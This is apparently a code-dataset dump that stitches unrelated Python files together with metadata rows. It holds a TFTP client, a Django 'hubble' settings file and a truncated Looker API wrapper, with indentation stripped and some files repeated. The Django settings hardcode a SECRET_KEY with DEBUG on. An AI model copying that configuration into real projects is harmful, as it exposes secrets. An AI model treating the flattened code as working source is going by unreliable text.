if opt in ('-r', '--rfc1350'):
rfc1350 = True
client = TFTPClient((host, port), exts, mode, rfc1350)
client.serve_forever()
print('Goodbye.')
return 0
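# Illustrative invocation (sketch; the host value is hypothetical):
#   python tftpclient.py --host 192.168.0.10 --blksize 1428 --windowsize 8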
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 33.323907
| 120
| 0.56588
|
from __future__ import print_function
try:
input = raw_input
except NameError:
pass
from datetime import datetime
import os
import shutil
import socket
import stat
import sys
import tempfile
import notify
import proto
import state
l = notify.getLogger('tftp')
_UDP_TRANSFER_SIZE = 2**16
_PTFTP_DEFAULT_PORT = 69
_PTFTP_DEFAULT_HOST = 'localhost'
_PTFTP_DEFAULT_MODE = 'octet'
_PTFTP_DEFAULT_OPTS = {
proto.TFTP_OPTION_BLKSIZE: proto.TFTP_LAN_PACKET_SIZE,
proto.TFTP_OPTION_WINDOWSIZE: proto.TFTP_LAN_WINDOW_SIZE,
}
_PTFTP_RFC1350_OPTS = {
proto.TFTP_OPTION_BLKSIZE: proto.TFTP_DEFAULT_PACKET_SIZE,
}
class UDPMessageSocket(object):
def __init__(self):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.reset()
@property
def rport(self):
return self._rport
def settimeout(self, timeout):
self._sock.settimeout(timeout)
def send(self, message, peer):
self._sock.sendto(message, peer)
def reset(self):
self._buffer = None
self._rport = None
def close(self):
self._sock.close()
def recv(self, blksize):
if not self._buffer:
self._recv()
if not self._buffer:
return None
opcode = proto.TFTPHelper.get_opcode(self._buffer)
if opcode == proto.OP_DATA:
size = proto.TFTPHelper.get_data_size(blksize)
data, self._buffer = self._buffer[:size], self._buffer[size:]
else:
data, self._buffer = self._buffer, None
return data
def _recv(self):
(data, (address, port)) = self._sock.recvfrom(_UDP_TRANSFER_SIZE)
if not self._rport:
self._rport = port
elif port != self._rport:
return
self._buffer = data
class TFTPClient(object):
PTFTP_STATE = None
def __init__(self, peer, opts=None, mode='octet', rfc1350=False,
notification_callbacks=None):
if notification_callbacks is None:
notification_callbacks = {}
self.peer = peer
self.transfer_mode = mode
self.error = False
self.rfc1350 = rfc1350
self.opts = opts
if rfc1350:
self.opts = _PTFTP_RFC1350_OPTS
print('Running in RFC1350 compliance mode.')
else:
if not self.opts:
self.opts = _PTFTP_DEFAULT_OPTS
if proto.TFTP_OPTION_BLKSIZE not in self.opts:
self.opts[proto.TFTP_OPTION_BLKSIZE] = \
_PTFTP_DEFAULT_OPTS[proto.TFTP_OPTION_BLKSIZE]
notify.CallbackEngine.install(l, notification_callbacks)
def connect(self):
self.sock = UDPMessageSocket()
self.sock.settimeout(state.STATE_TIMEOUT_SECS)
print('Connected to {}:{}.'.format(self.peer[0], self.peer[1]))
def finish(self):
self.sock.close()
def serve_forever(self):
self.connect()
while True:
print()
try:
command = input('tftp> ')
except EOFError:
print()
break
if not command:
continue
cmd_parts = command.split(' ')
if cmd_parts[0] in ('?', 'help'):
self.usage()
elif cmd_parts[0] in ('g', 'get'):
self.get(cmd_parts[1:])
elif cmd_parts[0] in ('p', 'put'):
self.put(cmd_parts[1:])
elif cmd_parts[0] in ('q', 'quit'):
break
elif cmd_parts[0] in ('m', 'mode'):
self.mode(cmd_parts[1:])
elif cmd_parts[0] in ('b', 'blksize'):
self.blksize(cmd_parts[1:])
elif cmd_parts[0] in ('w', 'windowsize'):
self.windowsize(cmd_parts[1:])
else:
print('Unrecognized command. Try help.')
self.finish()
def usage(self):
print('Available commands:')
print()
print('? help Display help')
print('q quit Quit the TFTP client')
print('m mode [newmode] Display or change transfer mode')
print('b blksize [newsize] Display or change the transfer block size')
print('w windowsize [newsize] Display or change the transfer window size')
print()
print('g get [-f] <filename> Get <filename> from server.')
print(' (use -f to overwrite local file)')
print('p put <filename> Push <filename> to the server')
print()
def handle(self):
if not self.PTFTP_STATE:
self.error = (True, 'Connection state error.')
return
self.error = False
self.sock.reset()
while not self.PTFTP_STATE.done and not self.error:
try:
blksize = self.opts[proto.TFTP_OPTION_BLKSIZE]
request = self.sock.recv(blksize)
if not request:
continue
except socket.timeout:
self.error = (True, 'Connection timed out.')
return
if not self.PTFTP_STATE.tid:
self.PTFTP_STATE.tid = self.sock.rport
print('Communicating with {}:{}.'
.format(self.peer[0], self.PTFTP_STATE.tid))
response = None
opcode = proto.TFTPHelper.get_opcode(request)
if not opcode:
self.error = (True, None)
response = proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
elif opcode not in proto.TFTP_OPS:
self.error = (True,
"Unknown or unsupported operation %d!" % opcode)
response = proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
else:
try:
handler = getattr(self, "serve%s" % proto.TFTP_OPS[opcode])
response = handler(opcode, request[2:])
except AttributeError:
self.error = (True, 'Operation not supported.')
response = proto.TFTPHelper.createERROR(
proto.ERROR_UNDEF, 'Operation not supported.')
if response:
peer = (self.peer[0], self.PTFTP_STATE.tid)
self.sock.send(response, peer)
def serveOACK(self, op, request):
try:
opts = proto.TFTPHelper.parseOACK(request)
except SyntaxError:
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
opts = proto.TFTPHelper.parse_options(opts)
if opts:
self.PTFTP_STATE.set_opts(opts)
else:
self.error = (True, 'Transfer options parsing failed.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_OPTION_NEGOCIATION
if self.PTFTP_STATE.state == state.STATE_RECV:
self.PTFTP_STATE.state = state.STATE_RECV_ACK
return self.PTFTP_STATE.next()
def serveACK(self, op, request):
try:
num = proto.TFTPHelper.parseACK(request)
except SyntaxError:
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
if self.PTFTP_STATE.state == state.STATE_SEND:
if self.PTFTP_STATE.packetnum != num:
self.error = (True,
'Got ACK with incoherent data packet number.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_ILLEGAL_OP
if not self.rfc1350 and num >= proto.TFTP_PACKETNUM_MAX-1:
print('Packet number wraparound.')
return self.PTFTP_STATE.next()
elif self.PTFTP_STATE.state == state.STATE_SEND_LAST:
self.PTFTP_STATE.done = True
return None
print('ERROR: Unexpected ACK!')
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
def serveDATA(self, op, request):
try:
num, data = proto.TFTPHelper.parseDATA(request)
except SyntaxError:
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
if len(data) > self.PTFTP_STATE.opts[proto.TFTP_OPTION_BLKSIZE]:
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
if self.PTFTP_STATE.state == state.STATE_RECV:
if num != self.PTFTP_STATE.packetnum:
self.error = (True, 'Got DATA with incoherent packet number.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_ILLEGAL_OP
else:
self.PTFTP_STATE.data = data
if not self.PTFTP_STATE.done and not self.rfc1350 and \
num >= proto.TFTP_PACKETNUM_MAX - 1:
print('Packet number wraparound.')
return self.PTFTP_STATE.next()
print('ERROR: Unexpected DATA!')
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
def serveERROR(self, op, request):
try:
errno, errmsg = proto.TFTPHelper.parseERROR(request)
except SyntaxError:
return None
if self.PTFTP_STATE.op == proto.OP_RRQ:
self.PTFTP_STATE.purge()
self.error = (True, errmsg)
return None
def get(self, args):
if len(args) < 1 or len(args) > 2:
print('Usage: get [-f] <filename>')
return False
filepath = args[0]
overwrite = False
if len(args) == 2:
filepath = args[1]
if args[0] == '-f':
overwrite = True
(_, filename) = os.path.split(filepath)
if not overwrite:
try:
open(filename)
print('Error: local file {} already exists!'.format(filename))
print('Use get -f to overwrite the local file.')
return False
except IOError:
pass
self.PTFTP_STATE = state.TFTPState(self.peer, proto.OP_RRQ,
'', filepath, self.transfer_mode,
not self.rfc1350)
# Then, before sending anything to the server, open the file
# for writing
try:
            # We don't want tempfile to automatically delete the temporary
            # file on close(); we handle its deletion ourselves.
self.PTFTP_STATE.file = tempfile.NamedTemporaryFile(delete=False)
self.PTFTP_STATE.packetnum = 1
self.PTFTP_STATE.state = state.STATE_RECV
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t write to temporary file {}!'
.format(self.PTFTP_STATE.file.name))
return False
opts = dict(self.opts)
# When not running in RFC1350 compliance mode, append tsize: 0
# to the list of options in the request to get the requested
# file size back in the OACK.
if not self.rfc1350:
opts[proto.TFTP_OPTION_TSIZE] = 0
# Everything's OK, let's go
print("Retrieving '%s' from the remote host..." % filename)
packet = proto.TFTPHelper.createRRQ(filepath, self.transfer_mode, opts)
transfer_start = datetime.today()
self.sock.send(packet, self.peer)
self.handle()
transfer_time = datetime.today() - transfer_start
if self.error:
error, errmsg = self.error
if error and errmsg:
print('Error: {}'.format(errmsg))
            # Remove the temporary file on error. The destination file,
# if it already existed, is left untouched.
self.PTFTP_STATE.file.close()
os.remove(self.PTFTP_STATE.file.name)
return False
# Copy the temporary file to its final destination
try:
shutil.copy(self.PTFTP_STATE.file.name, filename)
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t copy temporary file to local file {}!'
.format(filename))
return False
print('Transfer complete, {} bytes ({:.2f} kB/s)'
.format(self.PTFTP_STATE.filesize,
self.__get_speed(self.PTFTP_STATE.filesize,
transfer_time)))
self.PTFTP_STATE.file.close()
os.remove(self.PTFTP_STATE.file.name)
return True
def put(self, args):
if len(args) != 1:
print('Usage: put <filename>')
return
filepath = args[0]
self.PTFTP_STATE = state.TFTPState(self.peer, proto.OP_WRQ,
'', filepath, self.transfer_mode,
not self.rfc1350)
try:
self.PTFTP_STATE.file = open(filepath, 'rb')
self.PTFTP_STATE.filesize = os.stat(filepath)[stat.ST_SIZE]
self.PTFTP_STATE.packetnum = 0
self.PTFTP_STATE.state = state.STATE_SEND
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t read from local file {}!'.format(filepath))
return False
opts = dict(self.opts)
# When not running in RFC1350 compliance mode, append the
# tsize option to the request options to specify the
        # transferred file size to the server.
if not self.rfc1350:
opts[proto.TFTP_OPTION_TSIZE] = self.PTFTP_STATE.filesize
# Everything's OK, let's go
print("Pushing '%s' to the remote host..." % filepath)
packet = proto.TFTPHelper.createWRQ(filepath, self.transfer_mode, opts)
transfer_start = datetime.today()
self.sock.send(packet, self.peer)
self.handle()
transfer_time = datetime.today() - transfer_start
if self.error:
error, errmsg = self.error
if error and errmsg:
print('Error: {}'.format(errmsg))
return False
print('Transfer complete, {} bytes ({:.2f} kB/s)'
.format(self.PTFTP_STATE.filesize,
self.__get_speed(self.PTFTP_STATE.filesize,
transfer_time)))
return True
def mode(self, args):
if len(args) > 1:
print('Usage: mode [newmode]')
return
if not len(args):
print('Current transfer mode: {}.'.format(self.transfer_mode))
print('Available transfer modes: {}'
.format(', '.join(proto.TFTP_MODES)))
return
if args[0].lower() in proto.TFTP_MODES:
self.transfer_mode = args[0].lower()
print('Mode set to {}.'.format(self.transfer_mode))
else:
print('Unknown transfer mode, use one of: {}'
.format(', '.join(proto.TFTP_MODES)))
def blksize(self, args):
if len(args) > 1:
print('Usage: blksize [newsize]')
return
if not len(args):
print('Current block size: {} byte(s).'
.format(self.opts[proto.TFTP_OPTION_BLKSIZE]))
return
try:
self.opts[proto.TFTP_OPTION_BLKSIZE] = int(args[0])
print('Block size set to {} byte(s).'
.format(self.opts[proto.TFTP_OPTION_BLKSIZE]))
except ValueError:
print('Block size must be a number!')
def windowsize(self, args):
if len(args) > 1:
print('Usage: windowsize [newsize]')
return
if not len(args):
print('Current window size: {} packet(s).'
.format(self.opts[proto.TFTP_OPTION_WINDOWSIZE]))
return
try:
self.opts[proto.TFTP_OPTION_WINDOWSIZE] = int(args[0])
print('Window size set to {} packet(s).'
.format(self.opts[proto.TFTP_OPTION_WINDOWSIZE]))
except ValueError:
print('Window size must be a number!')
def __get_speed(self, filesize, time):
return (filesize / 1024.0 /
(time.seconds + time.microseconds / 1000000.0))
def usage():
print("usage: %s [options]" % sys.argv[0])
print()
print(" -? --help Get help")
print(" -h --host <host> Set TFTP server (default: %s)" % _PTFTP_DEFAULT_HOST)
print(" -p --port <port> Define the port to connect to (default: %d)" % _PTFTP_DEFAULT_PORT)
print(" -m --mode <mode> Set transfer mode (default: %s)" % _PTFTP_DEFAULT_MODE)
print(" Must be one of:", ', '.join(proto.TFTP_MODES))
print()
print("Available extra options (using the TFTP option extension protocol):")
print(" -b --blksize <n> Set transfer block size (default: %d bytes)" % proto.TFTP_LAN_PACKET_SIZE)
print(" Must be between %d and %d" % (proto.TFTP_BLKSIZE_MIN, proto.TFTP_BLKSIZE_MAX))
print(" -w --windowsize <n> Set streaming window size (default: %d)" % proto.TFTP_LAN_WINDOW_SIZE)
print(" Must be between %d and %d" % (proto.TFTP_WINDOWSIZE_MIN, proto.TFTP_WINDOWSIZE_MAX))
print()
print("To disable the use of TFTP extensions:")
print(" -r --rfc1350 Strictly comply to the RFC1350 only (no extensions)")
print(" This will discard other TFTP option values.")
print()
def main():
# TODO: convert to optparse
import getopt
try:
opts, args = getopt.getopt(sys.argv[1:], '?h:p:b:w:m:r',
['help', 'host=',
'port=', 'blksize=',
'windowsize=', 'mode=',
'rfc1350'])
except getopt.GetoptError:
usage()
return 1
host = _PTFTP_DEFAULT_HOST
port = _PTFTP_DEFAULT_PORT
mode = _PTFTP_DEFAULT_MODE
exts = {}
rfc1350 = False
for opt, val in opts:
if opt in ('-?', '--help'):
usage()
return 0
if opt in ('-h', '--host'):
host = val
if opt in ('-p', '--port'):
try:
port = int(val)
except ValueError:
print('Port must be a number!')
return 2
if opt in ('-b', '--blksize'):
try:
exts[proto.TFTP_OPTION_BLKSIZE] = int(val)
except ValueError:
print('Block size must be a number!')
return 2
if opt in ('-w', '--windowsize'):
try:
exts[proto.TFTP_OPTION_WINDOWSIZE] = int(val)
except ValueError:
print('Window size must be a number!')
return 2
if opt in ('-m', '--mode'):
if val in proto.TFTP_MODES:
mode = val
else:
print('Transfer mode must be one of: {}'
.format(', '.join(proto.TFTP_MODES)))
return 2
if opt in ('-r', '--rfc1350'):
rfc1350 = True
client = TFTPClient((host, port), exts, mode, rfc1350)
client.serve_forever()
print('Goodbye.')
return 0
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| true
| true
|
1c40dd64f42e4bab7e00b275d6fd51fa97380b91
| 3,597
|
py
|
Python
|
hubble/settings.py
|
lqm229026/hubble
|
bc9e5d8d37edf04447b1c52857dc521cd1db91ad
|
[
"Apache-2.0"
] | null | null | null |
hubble/settings.py
|
lqm229026/hubble
|
bc9e5d8d37edf04447b1c52857dc521cd1db91ad
|
[
"Apache-2.0"
] | 7
|
2020-06-06T00:37:24.000Z
|
2022-02-10T11:05:24.000Z
|
hubble/settings.py
|
moonlight824/hubble
|
bc9e5d8d37edf04447b1c52857dc521cd1db91ad
|
[
"Apache-2.0"
] | null | null | null |
"""
Django settings for hubble project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!)=lj#vc=l2k6-n1f*_c!pyz29af2i!xmzsc602^5w!#ki)@tu'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'probe',
'users',
'snippets',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hubble.urls'
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
# 'DEFAULT_RENDERER_CLASSES': [
# 'rest_framework.renderers.JSONRenderer', # use JSON renderer to turn off browsable API
# ],
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination', # use pagination by default
'PAGE_SIZE': 10,
}
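# Illustrative paginated response shape with PageNumberPagination (sketch):
#   {"count": 42, "next": "...?page=2", "previous": null, "results": [...]}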
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hubble.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
from .local_settings import *
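# Illustrative local_settings.py sketch (assumption; the real file is not
# part of this snapshot -- production overrides typically look like):
#   DEBUG = False
#   ALLOWED_HOSTS = ['hubble.example.com']
#   SECRET_KEY = '<a fresh, secret value>'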
| 26.065217
| 110
| 0.695024
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '!)=lj#vc=l2k6-n1f*_c!pyz29af2i!xmzsc602^5w!#ki)@tu'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'probe',
'users',
'snippets',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hubble.urls'
REST_FRAMEWORK = {
    'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
],
# 'DEFAULT_RENDERER_CLASSES': [
# 'rest_framework.renderers.JSONRenderer', # use JSON renderer to turn off browsable API
# ],
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination', # use pagination by default
'PAGE_SIZE': 10,
}
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hubble.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
from .local_settings import *
| true
| true
|
1c40de9808148ccedb9de40c4f422ce5a7eb62e1
| 34,880
|
py
|
Python
|
spectacles/client.py
|
DylanBaker/looker-fonz
|
93dea44f14d38b8441f21264b968a4f7845cb690
|
[
"MIT"
] | null | null | null |
spectacles/client.py
|
DylanBaker/looker-fonz
|
93dea44f14d38b8441f21264b968a4f7845cb690
|
[
"MIT"
] | 8
|
2019-09-27T20:41:26.000Z
|
2019-10-02T21:43:31.000Z
|
spectacles/client.py
|
dbanalyticsco/spectacles
|
93dea44f14d38b8441f21264b968a4f7845cb690
|
[
"MIT"
] | null | null | null |
from typing import List, Dict, Optional
import time
from dataclasses import dataclass
import backoff # type: ignore
import requests
from requests.exceptions import Timeout, HTTPError, ConnectionError
import spectacles.utils as utils
from spectacles.types import JsonDict
from spectacles.logger import GLOBAL_LOGGER as logger
from spectacles.exceptions import SpectaclesException, LookerApiError
TIMEOUT_SEC = 300
BACKOFF_EXCEPTIONS = (Timeout, HTTPError, ConnectionError)
@dataclass(frozen=True) # Token is immutable
class AccessToken:
access_token: str
token_type: str
expires_in: int
expires_at: float
def __str__(self) -> str:
return self.access_token
@property
def expired(self) -> bool:
        return time.time() >= self.expires_at
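# Illustrative sketch (the token value is hypothetical): authenticate() below
# stores expires_at with a one-minute buffer, so a token issued now with
# expires_in=3600 reads as expired after ~59 minutes:
#   token = AccessToken('abc123', 'Bearer', 3600, time.time() + 3600 - 60)
#   token.expired   # False until the buffered deadline passes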
class LookerClient:
"""Wraps some endpoints of the Looker API, issues requests and handles responses.
Args:
base_url: Base URL for the Looker instance, e.g. https://mycompany.looker.com.
client_id: Looker API client ID.
client_secret: Looker API client secret.
port: Desired API port to use for requests.
api_version: Desired API version to use for requests.
Attributes:
api_url: Combined URL used as a base for request building.
session: Persistent session to avoid re-authenticating.
"""
def __init__(
self,
base_url: str,
client_id: str,
client_secret: str,
port: Optional[int] = None,
api_version: float = 3.1,
):
supported_api_versions = [3.1]
if api_version not in supported_api_versions:
raise SpectaclesException(
name="unsupported-api-version",
title="Specified API version is not supported.",
detail=(
f"Version '{api_version}' is not supported. "
"Please use one of these supported versions instead: "
f"{', '.join(str(ver) for ver in sorted(supported_api_versions))}"
),
)
self.base_url: str = base_url.rstrip("/")
if port is None and self.base_url.endswith("cloud.looker.com"):
# GCP-hosted instance, so use default port of 443 with HTTPS
if not self.base_url.startswith("https"):
raise SpectaclesException(
name="invalid-base-url",
title="Looker instance base URL is not valid.",
detail="The URL must be an HTTPS URL.",
)
self.api_url: str = f"{self.base_url}/api/{api_version}/"
else:
self.api_url = f"{self.base_url}:{port or 19999}/api/{api_version}/"
self.client_id: str = client_id
self.client_secret: str = client_secret
self.api_version: float = api_version
self.access_token: Optional[AccessToken] = None
self.session: requests.Session = requests.Session()
self.workspace: str = "production"
self.authenticate()
def authenticate(self) -> None:
"""Logs in to Looker's API using a client ID/secret pair and an API version.
        Uses the client ID, client secret, and API version that were stored
        on the instance by __init__.
"""
logger.debug(f"Authenticating to the Looker as client ID '{self.client_id}'")
url = utils.compose_url(self.api_url, path=["login"])
body = {"client_id": self.client_id, "client_secret": self.client_secret}
self.session.auth = NullAuth()
# This should not use `self.post` or it will create a recursive loop
response = self.session.post(url=url, data=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-authenticate",
title="Couldn't authenticate to the Looker API.",
status=response.status_code,
detail=(
f"Unable to authenticate with client ID '{self.client_id}'. "
"Check that your credentials are correct and try again."
),
response=response,
)
result = response.json()
if "expires_at" not in result:
# Calculate the expiration time with a one-minute buffer
result["expires_at"] = time.time() + result["expires_in"] - 60
self.access_token = AccessToken(**result)
self.session.headers = { # type: ignore
"Authorization": f"token {self.access_token}"
}
looker_version = self.get_looker_release_version()
logger.info(
f"Connected to Looker version {looker_version} "
f"using Looker API {self.api_version}"
)
@backoff.on_exception(
backoff.expo,
BACKOFF_EXCEPTIONS,
max_tries=2,
)
def request(self, method: str, url: str, *args, **kwargs) -> requests.Response:
if self.access_token and self.access_token.expired:
logger.debug("Looker API access token has expired, requesting a new one")
self.authenticate()
if self.workspace == "dev":
self.update_workspace("dev")
return self.session.request(method, url, *args, **kwargs)
def get(self, url, *args, **kwargs) -> requests.Response:
return self.request("GET", url, *args, **kwargs)
def post(self, url, *args, **kwargs) -> requests.Response:
return self.request("POST", url, *args, **kwargs)
def patch(self, url, *args, **kwargs) -> requests.Response:
return self.request("PATCH", url, *args, **kwargs)
def put(self, url, *args, **kwargs) -> requests.Response:
return self.request("PUT", url, *args, **kwargs)
def delete(self, url, *args, **kwargs) -> requests.Response:
return self.request("DELETE", url, *args, **kwargs)
def get_looker_release_version(self) -> str:
"""Gets the version number of connected Looker instance.
Returns:
str: Looker instance release version number (e.g. 6.22.12)
"""
logger.debug("Checking Looker instance release version")
url = utils.compose_url(self.api_url, path=["versions"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-version",
title="Couldn't get Looker's release version.",
status=response.status_code,
detail=(
"Unable to get the release version of your Looker instance. "
"Please try again."
),
response=response,
)
return response.json()["looker_release_version"]
def get_workspace(self) -> str:
"""Gets the session workspace.
Returns:
str: The session workspace, dev or production.
"""
logger.debug("Getting the workspace in use by this session")
url = utils.compose_url(self.api_url, path=["session"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-workspace",
title="Couldn't get the workspace.",
status=response.status_code,
detail=(
"Unable to get the workspace in use by this session. "
"Please try again."
),
response=response,
)
return response.json()["workspace_id"]
def update_workspace(self, workspace: str) -> None:
"""Updates the session workspace.
Args:
workspace: The workspace to switch to, either 'production' or 'dev'
"""
logger.debug(f"Updating session to use the {workspace} workspace")
url = utils.compose_url(self.api_url, path=["session"])
body = {"workspace_id": workspace}
response = self.patch(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-update-workspace",
title="Couldn't update the session's workspace.",
status=response.status_code,
detail=(
f"Unable to update workspace to '{workspace}'. "
"If you have any unsaved work on the branch "
"checked out by the user whose API credentials "
"Spectacles is using, please save it and try again."
),
response=response,
)
self.workspace = workspace
def get_all_branches(self, project: str) -> List[str]:
"""Returns a list of git branches in the project repository.
Args:
project: Name of the Looker project to use.
"""
logger.debug(f"Getting all Git branches in project '{project}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "git_branches"]
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-branches",
title="Couldn't get all Git branches.",
status=response.status_code,
detail=(
f"Unable to get all Git branches in project '{project}'. "
"Please try again."
),
response=response,
)
return [branch["name"] for branch in response.json()]
def checkout_branch(self, project: str, branch: str) -> None:
"""Checks out a new git branch. Only works in dev workspace.
Args:
project: Name of the Looker project to use.
branch: Name of the Git branch to check out.
"""
logger.debug(f"Setting project '{project}' branch to '{branch}'")
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
body = {"name": branch}
response = self.put(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-checkout-branch",
title="Couldn't checkout Git branch.",
status=response.status_code,
detail=(
f"Unable to checkout Git branch '{branch}'. "
"If you have uncommitted changes on the current branch, "
"please commit or revert them, then try again."
),
response=response,
)
def reset_to_remote(self, project: str) -> None:
"""Reset a project development branch to the revision of the project that is on the remote.
Args:
project: Name of the Looker project to use.
"""
logger.debug("Resetting branch to remote.")
url = utils.compose_url(
self.api_url, path=["projects", project, "reset_to_remote"]
)
response = self.post(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-reset-remote",
title="Couldn't checkout Git branch.",
status=response.status_code,
detail=(
"Unable to reset local Git branch "
"to match remote. Please try again."
),
response=response,
)
def get_manifest(self, project: str) -> JsonDict:
"""Gets all the dependent LookML projects defined in the manifest file.
Args:
project: Name of the Looker project to use.
Returns:
            JsonDict: JSON response containing the manifest, including dependent projects
"""
logger.debug("Getting manifest details")
url = utils.compose_url(self.api_url, path=["projects", project, "manifest"])
